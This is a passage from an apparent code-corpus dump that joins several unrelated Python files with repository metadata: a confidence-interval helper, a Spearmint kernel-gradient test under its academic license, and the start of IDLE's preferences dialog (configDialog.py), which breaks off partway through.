        # Models compare attribute-wise; None never compares equal.
        if other is None:
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        # Negation of __eq__.
        return not self == other
| 37.549872 | 245 | 0.686078 |
ace749381b361e9ae563181c48d3b420a5180dfc | 261 | py | Python | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import scipy.stats
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)
return m, m-h, m+h
| 26.1 | 58 | 0.613027 |
ace7495b2d7812d540508532d6def074615212e4 | 10,398 | py | Python | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 1,590 | 2015-01-02T19:11:29.000Z | 2022-03-31T13:36:16.000Z | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 99 | 2015-02-20T06:45:49.000Z | 2021-12-06T13:28:44.000Z | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 366 | 2015-01-17T20:29:49.000Z | 2022-02-21T16:22:31.000Z | # -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: otd@harvard.edu
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import numpy as np
import numpy.random as npr
from spearmint.kernels import Matern52, Scale
def test_grad():
    """Check the analytic cross-covariance gradient of a scaled Matern52
    kernel against a central finite-difference estimate.

    Seeds numpy's RNG for reproducibility, draws random data matrices,
    and asserts that the analytic gradient of sum(cross_cov) with respect
    to the second data set matches the numeric estimate to within 1e-6.
    """
    npr.seed(1)
    eps = 1e-5   # finite-difference step size
    N = 10       # rows in first data set
    M = 5        # rows in second data set
    D = 3        # input dimensionality
    kernel = Scale(Matern52(D))
    kernel.amp2.value = 5.75
    data1 = npr.randn(N, D)
    data2 = npr.randn(M, D)
    # Analytic gradient, summed over the first data set's rows.
    dloss = kernel.cross_cov_grad_data(data1, data2).sum(0)
    dloss_est = np.zeros(dloss.shape)
    # Central differences over each entry of data2.
    # FIX: `xrange` is Python 2 only (NameError on Python 3); `range` is
    # behaviourally identical here.  Also dropped the unused `loss` local.
    for i in range(M):
        for j in range(D):
            data2[i, j] += eps
            loss_1 = np.sum(kernel.cross_cov(data1, data2))
            data2[i, j] -= 2 * eps
            loss_2 = np.sum(kernel.cross_cov(data1, data2))
            data2[i, j] += eps  # restore the original value
            dloss_est[i, j] = (loss_1 - loss_2) / (2 * eps)
    assert np.linalg.norm(dloss - dloss_est) < 1e-6
| 47.049774 | 70 | 0.763224 |
ace749b701a3dd769a97fbca55a1a0a8647a1f80 | 53,555 | py | Python | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | 1 | 2020-02-06T14:28:45.000Z | 2020-02-06T14:28:45.000Z | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | null | null | null | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | 1 | 2020-02-06T14:29:00.000Z | 2020-02-06T14:29:00.000Z | """IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from Tkinter import *
import tkMessageBox, tkColorChooser, tkFont
import string
from idlelib.configHandler import idleConf
from idlelib.dynOptionMenuWidget import DynOptionMenu
from idlelib.tabbedpages import TabbedPageSet
from idlelib.keybindingDialog import GetKeysDialog
from idlelib.configSectionNameDialog import GetCfgSectionNameDialog
from idlelib.configHelpSourceEdit import GetHelpSourceDialog
from idlelib import macosxSupport
class ConfigDialog(Toplevel):
    def __init__(self,parent,title):
        """Build and run the modal 'IDLE Preferences' dialog.

        parent -- the Tk window this dialog is transient for.
        title  -- accepted but unused; the title is hard-coded below.

        Construction order matters: config values are loaded into the Tk
        variables (LoadConfigs) BEFORE the variable traces are attached
        (AttachVarCallbacks), so loading does not register as user edits.
        wait_window() blocks until the dialog is dismissed.
        """
        Toplevel.__init__(self, parent)
        self.wm_withdraw()
        self.configure(borderwidth=5)
        self.title('IDLE Preferences')
        self.geometry("+%d+%d" % (parent.winfo_rootx()+20,
                parent.winfo_rooty()+30))
        #Theme Elements. Each theme element key is its display name.
        #The first value of the tuple is the sample area tag name.
        #The second value is the display name list sort index.
        self.themeElements={'Normal Text':('normal','00'),
            'Python Keywords':('keyword','01'),
            'Python Definitions':('definition','02'),
            'Python Builtins':('builtin', '03'),
            'Python Comments':('comment','04'),
            'Python Strings':('string','05'),
            'Selected Text':('hilite','06'),
            'Found Text':('hit','07'),
            'Cursor':('cursor','08'),
            'Error Text':('error','09'),
            'Shell Normal Text':('console','10'),
            'Shell Stdout Text':('stdout','11'),
            'Shell Stderr Text':('stderr','12'),
            }
        self.ResetChangedItems() #load initial values in changed items dict
        self.CreateWidgets()
        self.resizable(height=FALSE,width=FALSE)
        self.transient(parent)
        self.grab_set()
        self.protocol("WM_DELETE_WINDOW", self.Cancel)
        self.parent = parent
        self.tabPages.focus_set()
        #key bindings for this dialog
        #self.bind('<Escape>',self.Cancel) #dismiss dialog, no save
        #self.bind('<Alt-a>',self.Apply) #apply changes, save
        #self.bind('<F1>',self.Help) #context help
        self.LoadConfigs()
        self.AttachVarCallbacks() #avoid callbacks during LoadConfigs
        self.wm_deiconify()
        self.wait_window()
    def CreateWidgets(self):
        """Create the four tab pages and the Ok/Apply/Cancel button row.

        Delegates page content to the CreatePage* methods; the Help
        button is intentionally left commented out until self.Help exists.
        """
        self.tabPages = TabbedPageSet(self,
                page_names=['Fonts/Tabs','Highlighting','Keys','General'])
        frameActionButtons = Frame(self,pady=2)
        #action buttons
        if macosxSupport.isAquaTk():
            # Changing the default padding on OSX results in unreadable
            # text in the buttons
            paddingArgs={}
        else:
            paddingArgs={'padx':6, 'pady':3}
        # Comment out button creation and packing until implement self.Help
##        self.buttonHelp = Button(frameActionButtons,text='Help',
##                command=self.Help,takefocus=FALSE,
##                **paddingArgs)
        self.buttonOk = Button(frameActionButtons,text='Ok',
                command=self.Ok,takefocus=FALSE,
                **paddingArgs)
        self.buttonApply = Button(frameActionButtons,text='Apply',
                command=self.Apply,takefocus=FALSE,
                **paddingArgs)
        self.buttonCancel = Button(frameActionButtons,text='Cancel',
                command=self.Cancel,takefocus=FALSE,
                **paddingArgs)
        self.CreatePageFontTab()
        self.CreatePageHighlight()
        self.CreatePageKeys()
        self.CreatePageGeneral()
##        self.buttonHelp.pack(side=RIGHT,padx=5)
        self.buttonOk.pack(side=LEFT,padx=5)
        self.buttonApply.pack(side=LEFT,padx=5)
        self.buttonCancel.pack(side=LEFT,padx=5)
        frameActionButtons.pack(side=BOTTOM)
        Frame(self, height=2, borderwidth=0).pack(side=BOTTOM)
        self.tabPages.pack(side=TOP,expand=TRUE,fill=BOTH)
    def CreatePageFontTab(self):
        """Build the 'Fonts/Tabs' page.

        Contains the font face listbox, size menu, bold checkbox, a live
        font sample label, and the indentation-width scale.  Font widgets
        feed SetFontSample via their commands/bindings.
        """
        #tkVars
        self.fontSize=StringVar(self)
        self.fontBold=BooleanVar(self)
        self.fontName=StringVar(self)
        self.spaceNum=IntVar(self)
        self.editFont=tkFont.Font(self,('courier',10,'normal'))
        ##widget creation
        #body frame
        frame=self.tabPages.pages['Fonts/Tabs'].frame
        #body section frames
        frameFont=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                             text=' Base Editor Font ')
        frameIndent=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                               text=' Indentation Width ')
        #frameFont
        frameFontName=Frame(frameFont)
        frameFontParam=Frame(frameFont)
        labelFontNameTitle=Label(frameFontName,justify=LEFT,
                                 text='Font Face :')
        self.listFontName=Listbox(frameFontName,height=5,takefocus=FALSE,
                                  exportselection=FALSE)
        self.listFontName.bind('<ButtonRelease-1>',self.OnListFontButtonRelease)
        scrollFont=Scrollbar(frameFontName)
        scrollFont.config(command=self.listFontName.yview)
        self.listFontName.config(yscrollcommand=scrollFont.set)
        labelFontSizeTitle=Label(frameFontParam,text='Size :')
        self.optMenuFontSize=DynOptionMenu(frameFontParam,self.fontSize,None,
                                           command=self.SetFontSample)
        checkFontBold=Checkbutton(frameFontParam,variable=self.fontBold,
                                  onvalue=1,offvalue=0,text='Bold',command=self.SetFontSample)
        frameFontSample=Frame(frameFont,relief=SOLID,borderwidth=1)
        self.labelFontSample=Label(frameFontSample,
                                   text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]',
                                   justify=LEFT,font=self.editFont)
        #frameIndent
        frameIndentSize=Frame(frameIndent)
        labelSpaceNumTitle=Label(frameIndentSize, justify=LEFT,
                                 text='Python Standard: 4 Spaces!')
        self.scaleSpaceNum=Scale(frameIndentSize, variable=self.spaceNum,
                                 orient='horizontal',
                                 tickinterval=2, from_=2, to=16)
        #widget packing
        #body
        frameFont.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
        frameIndent.pack(side=LEFT,padx=5,pady=5,fill=Y)
        #frameFont
        frameFontName.pack(side=TOP,padx=5,pady=5,fill=X)
        frameFontParam.pack(side=TOP,padx=5,pady=5,fill=X)
        labelFontNameTitle.pack(side=TOP,anchor=W)
        self.listFontName.pack(side=LEFT,expand=TRUE,fill=X)
        scrollFont.pack(side=LEFT,fill=Y)
        labelFontSizeTitle.pack(side=LEFT,anchor=W)
        self.optMenuFontSize.pack(side=LEFT,anchor=W)
        checkFontBold.pack(side=LEFT,anchor=W,padx=20)
        frameFontSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
        self.labelFontSample.pack(expand=TRUE,fill=BOTH)
        #frameIndent
        frameIndentSize.pack(side=TOP,fill=X)
        labelSpaceNumTitle.pack(side=TOP,anchor=W,padx=5)
        self.scaleSpaceNum.pack(side=TOP,padx=5,fill=X)
        return frame
    def CreatePageHighlight(self):
        """Build the 'Highlighting' page.

        Left side: an interactive, read-only Text sample whose tagged
        elements select the highlight target when clicked, plus the
        colour chooser and fg/bg radio buttons.  Right side: the
        built-in/custom theme selectors and delete button.
        """
        self.builtinTheme=StringVar(self)
        self.customTheme=StringVar(self)
        self.fgHilite=BooleanVar(self)
        self.colour=StringVar(self)
        self.fontName=StringVar(self)
        self.themeIsBuiltin=BooleanVar(self)
        self.highlightTarget=StringVar(self)
        ##widget creation
        #body frame
        frame=self.tabPages.pages['Highlighting'].frame
        #body section frames
        frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                               text=' Custom Highlighting ')
        frameTheme=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                              text=' Highlighting Theme ')
        #frameCustom
        self.textHighlightSample=Text(frameCustom,relief=SOLID,borderwidth=1,
            font=('courier',12,''),cursor='hand2',width=21,height=11,
            takefocus=FALSE,highlightthickness=0,wrap=NONE)
        text=self.textHighlightSample
        # Swallow selection gestures so the sample stays click-to-choose only.
        text.bind('<Double-Button-1>',lambda e: 'break')
        text.bind('<B1-Motion>',lambda e: 'break')
        textAndTags=(('#you can click here','comment'),('\n','normal'),
            ('#to choose items','comment'),('\n','normal'),('def','keyword'),
            (' ','normal'),('func','definition'),('(param):','normal'),
            ('\n ','normal'),('"""string"""','string'),('\n var0 = ','normal'),
            ("'string'",'string'),('\n var1 = ','normal'),("'selected'",'hilite'),
            ('\n var2 = ','normal'),("'found'",'hit'),
            ('\n var3 = ','normal'),('list', 'builtin'), ('(','normal'),
            ('None', 'builtin'),(')\n\n','normal'),
            (' error ','error'),(' ','normal'),('cursor |','cursor'),
            ('\n ','normal'),('shell','console'),(' ','normal'),('stdout','stdout'),
            (' ','normal'),('stderr','stderr'),('\n','normal'))
        for txTa in textAndTags:
            text.insert(END,txTa[0],txTa[1])
        # Clicking a tagged region selects that element as the highlight
        # target (elem is bound as a default arg to avoid late binding).
        for element in self.themeElements.keys():
            text.tag_bind(self.themeElements[element][0],'<ButtonPress-1>',
                lambda event,elem=element: event.widget.winfo_toplevel()
                .highlightTarget.set(elem))
        text.config(state=DISABLED)
        self.frameColourSet=Frame(frameCustom,relief=SOLID,borderwidth=1)
        frameFgBg=Frame(frameCustom)
        buttonSetColour=Button(self.frameColourSet,text='Choose Colour for :',
            command=self.GetColour,highlightthickness=0)
        self.optMenuHighlightTarget=DynOptionMenu(self.frameColourSet,
            self.highlightTarget,None,highlightthickness=0)#,command=self.SetHighlightTargetBinding
        self.radioFg=Radiobutton(frameFgBg,variable=self.fgHilite,
            value=1,text='Foreground',command=self.SetColourSampleBinding)
        self.radioBg=Radiobutton(frameFgBg,variable=self.fgHilite,
            value=0,text='Background',command=self.SetColourSampleBinding)
        self.fgHilite.set(1)
        buttonSaveCustomTheme=Button(frameCustom,
            text='Save as New Custom Theme',command=self.SaveAsNewTheme)
        #frameTheme
        labelTypeTitle=Label(frameTheme,text='Select : ')
        self.radioThemeBuiltin=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
            value=1,command=self.SetThemeType,text='a Built-in Theme')
        self.radioThemeCustom=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
            value=0,command=self.SetThemeType,text='a Custom Theme')
        self.optMenuThemeBuiltin=DynOptionMenu(frameTheme,
            self.builtinTheme,None,command=None)
        self.optMenuThemeCustom=DynOptionMenu(frameTheme,
            self.customTheme,None,command=None)
        self.buttonDeleteCustomTheme=Button(frameTheme,text='Delete Custom Theme',
            command=self.DeleteCustomTheme)
        ##widget packing
        #body
        frameCustom.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
        frameTheme.pack(side=LEFT,padx=5,pady=5,fill=Y)
        #frameCustom
        self.frameColourSet.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=X)
        frameFgBg.pack(side=TOP,padx=5,pady=0)
        self.textHighlightSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,
            fill=BOTH)
        buttonSetColour.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=4)
        self.optMenuHighlightTarget.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=3)
        self.radioFg.pack(side=LEFT,anchor=E)
        self.radioBg.pack(side=RIGHT,anchor=W)
        buttonSaveCustomTheme.pack(side=BOTTOM,fill=X,padx=5,pady=5)
        #frameTheme
        labelTypeTitle.pack(side=TOP,anchor=W,padx=5,pady=5)
        self.radioThemeBuiltin.pack(side=TOP,anchor=W,padx=5)
        self.radioThemeCustom.pack(side=TOP,anchor=W,padx=5,pady=2)
        self.optMenuThemeBuiltin.pack(side=TOP,fill=X,padx=5,pady=5)
        self.optMenuThemeCustom.pack(side=TOP,fill=X,anchor=W,padx=5,pady=5)
        self.buttonDeleteCustomTheme.pack(side=TOP,fill=X,padx=5,pady=5)
        return frame
    def CreatePageKeys(self):
        """Build the 'Keys' page.

        Contains the scrollable action/binding listbox (clicking a row
        enables the 'Get New Keys' button) and the built-in/custom key
        set selectors with save/delete buttons.
        """
        #tkVars
        self.bindingTarget=StringVar(self)
        self.builtinKeys=StringVar(self)
        self.customKeys=StringVar(self)
        self.keysAreBuiltin=BooleanVar(self)
        self.keyBinding=StringVar(self)
        ##widget creation
        #body frame
        frame=self.tabPages.pages['Keys'].frame
        #body section frames
        frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                               text=' Custom Key Bindings ')
        frameKeySets=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                                text=' Key Set ')
        #frameCustom
        frameTarget=Frame(frameCustom)
        labelTargetTitle=Label(frameTarget,text='Action - Key(s)')
        scrollTargetY=Scrollbar(frameTarget)
        scrollTargetX=Scrollbar(frameTarget,orient=HORIZONTAL)
        self.listBindings=Listbox(frameTarget,takefocus=FALSE,
                                  exportselection=FALSE)
        self.listBindings.bind('<ButtonRelease-1>',self.KeyBindingSelected)
        scrollTargetY.config(command=self.listBindings.yview)
        scrollTargetX.config(command=self.listBindings.xview)
        self.listBindings.config(yscrollcommand=scrollTargetY.set)
        self.listBindings.config(xscrollcommand=scrollTargetX.set)
        self.buttonNewKeys=Button(frameCustom,text='Get New Keys for Selection',
            command=self.GetNewKeys,state=DISABLED)
        #frameKeySets
        frames = [Frame(frameKeySets, padx=2, pady=2, borderwidth=0)
                  for i in range(2)]
        self.radioKeysBuiltin=Radiobutton(frames[0],variable=self.keysAreBuiltin,
            value=1,command=self.SetKeysType,text='Use a Built-in Key Set')
        self.radioKeysCustom=Radiobutton(frames[0],variable=self.keysAreBuiltin,
            value=0,command=self.SetKeysType,text='Use a Custom Key Set')
        self.optMenuKeysBuiltin=DynOptionMenu(frames[0],
            self.builtinKeys,None,command=None)
        self.optMenuKeysCustom=DynOptionMenu(frames[0],
            self.customKeys,None,command=None)
        self.buttonDeleteCustomKeys=Button(frames[1],text='Delete Custom Key Set',
            command=self.DeleteCustomKeys)
        buttonSaveCustomKeys=Button(frames[1],
            text='Save as New Custom Key Set',command=self.SaveAsNewKeySet)
        ##widget packing
        #body
        frameCustom.pack(side=BOTTOM,padx=5,pady=5,expand=TRUE,fill=BOTH)
        frameKeySets.pack(side=BOTTOM,padx=5,pady=5,fill=BOTH)
        #frameCustom
        self.buttonNewKeys.pack(side=BOTTOM,fill=X,padx=5,pady=5)
        frameTarget.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
        #frame target
        frameTarget.columnconfigure(0,weight=1)
        frameTarget.rowconfigure(1,weight=1)
        labelTargetTitle.grid(row=0,column=0,columnspan=2,sticky=W)
        self.listBindings.grid(row=1,column=0,sticky=NSEW)
        scrollTargetY.grid(row=1,column=1,sticky=NS)
        scrollTargetX.grid(row=2,column=0,sticky=EW)
        #frameKeySets
        self.radioKeysBuiltin.grid(row=0, column=0, sticky=W+NS)
        self.radioKeysCustom.grid(row=1, column=0, sticky=W+NS)
        self.optMenuKeysBuiltin.grid(row=0, column=1, sticky=NSEW)
        self.optMenuKeysCustom.grid(row=1, column=1, sticky=NSEW)
        self.buttonDeleteCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
        buttonSaveCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
        frames[0].pack(side=TOP, fill=BOTH, expand=True)
        frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
        return frame
    def CreatePageGeneral(self):
        """Build the 'General' page.

        Contains startup window choice, run-autosave policy, initial
        window size, paragraph reformat width, default source encoding,
        and the additional help-source list with Edit/Add/Remove buttons.
        """
        #tkVars
        self.winWidth=StringVar(self)
        self.winHeight=StringVar(self)
        self.paraWidth=StringVar(self)
        self.startupEdit=IntVar(self)
        self.autoSave=IntVar(self)
        self.encoding=StringVar(self)
        self.userHelpBrowser=BooleanVar(self)
        self.helpBrowser=StringVar(self)
        #widget creation
        #body
        frame=self.tabPages.pages['General'].frame
        #body section frames
        frameRun=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                            text=' Startup Preferences ')
        frameSave=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                             text=' Autosave Preferences ')
        frameWinSize=Frame(frame,borderwidth=2,relief=GROOVE)
        frameParaSize=Frame(frame,borderwidth=2,relief=GROOVE)
        frameEncoding=Frame(frame,borderwidth=2,relief=GROOVE)
        frameHelp=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                             text=' Additional Help Sources ')
        #frameRun
        labelRunChoiceTitle=Label(frameRun,text='At Startup')
        radioStartupEdit=Radiobutton(frameRun,variable=self.startupEdit,
            value=1,command=self.SetKeysType,text="Open Edit Window")
        radioStartupShell=Radiobutton(frameRun,variable=self.startupEdit,
            value=0,command=self.SetKeysType,text='Open Shell Window')
        #frameSave
        labelRunSaveTitle=Label(frameSave,text='At Start of Run (F5)  ')
        radioSaveAsk=Radiobutton(frameSave,variable=self.autoSave,
            value=0,command=self.SetKeysType,text="Prompt to Save")
        radioSaveAuto=Radiobutton(frameSave,variable=self.autoSave,
            value=1,command=self.SetKeysType,text='No Prompt')
        #frameWinSize
        labelWinSizeTitle=Label(frameWinSize,text='Initial Window Size'+
                '  (in characters)')
        labelWinWidthTitle=Label(frameWinSize,text='Width')
        entryWinWidth=Entry(frameWinSize,textvariable=self.winWidth,
                            width=3)
        labelWinHeightTitle=Label(frameWinSize,text='Height')
        entryWinHeight=Entry(frameWinSize,textvariable=self.winHeight,
                             width=3)
        #paragraphFormatWidth
        labelParaWidthTitle=Label(frameParaSize,text='Paragraph reformat'+
                ' width (in characters)')
        entryParaWidth=Entry(frameParaSize,textvariable=self.paraWidth,
                             width=3)
        #frameEncoding
        labelEncodingTitle=Label(frameEncoding,text="Default Source Encoding")
        radioEncLocale=Radiobutton(frameEncoding,variable=self.encoding,
            value="locale",text="Locale-defined")
        radioEncUTF8=Radiobutton(frameEncoding,variable=self.encoding,
            value="utf-8",text="UTF-8")
        radioEncNone=Radiobutton(frameEncoding,variable=self.encoding,
            value="none",text="None")
        #frameHelp
        frameHelpList=Frame(frameHelp)
        frameHelpListButtons=Frame(frameHelpList)
        scrollHelpList=Scrollbar(frameHelpList)
        self.listHelp=Listbox(frameHelpList,height=5,takefocus=FALSE,
                exportselection=FALSE)
